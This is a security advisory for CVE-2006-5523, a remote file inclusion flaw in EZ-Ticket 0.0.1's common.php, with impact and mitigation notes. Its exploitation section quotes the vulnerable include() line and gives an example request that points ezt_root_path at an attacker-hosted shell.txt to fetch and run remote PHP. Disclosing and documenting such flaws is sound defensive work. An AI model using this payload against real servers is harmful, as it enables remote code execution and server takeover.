CVE-2006-5523

Vulnerability

EZ-Ticket version 0.0.1 includes a remote file inclusion vulnerability in the common.php file. The script unsafely uses the $ezt_root_path variable in an include() statement on line 3: include($ezt_root_path . '/functions/anti-hack.php');. An attacker can control $ezt_root_path via the ezt_root_path GET parameter, leading to inclusion of arbitrary remote PHP files. The vulnerable code is present in the ezt-0.01.tar.gz distribution [1][2].

Exploitation

An attacker needs only network access to the target web server. No authentication is required. The exploit is performed by sending an HTTP request to common.php with the ezt_root_path parameter set to a URL pointing to a malicious PHP script. For example: http://[Target]/[Path]/common.php?ezt_root_path=http://attacker.com/shell.txt? [2]. The trailing ? is used to strip the appended path segment. The attacker must host a PHP payload on a server reachable from the target.

Impact

Successful exploitation allows remote attackers to execute arbitrary PHP code on the target server. This can lead to full compromise of the web application and potentially the underlying server, including data theft, defacement, or further lateral movement. The code runs with the privileges of the web server process.

Mitigation

No official patch or fixed version has been released for EZ-Ticket 0.0.1. The project appears to be abandoned. As a workaround, administrators should remove or disable the common.php file if not required, or apply input validation to the ezt_root_path parameter. Alternatively, consider migrating to a supported ticket system. The vulnerability is listed in the Exploit-DB archive [2] but not in CISA's Known Exploited Vulnerabilities catalog.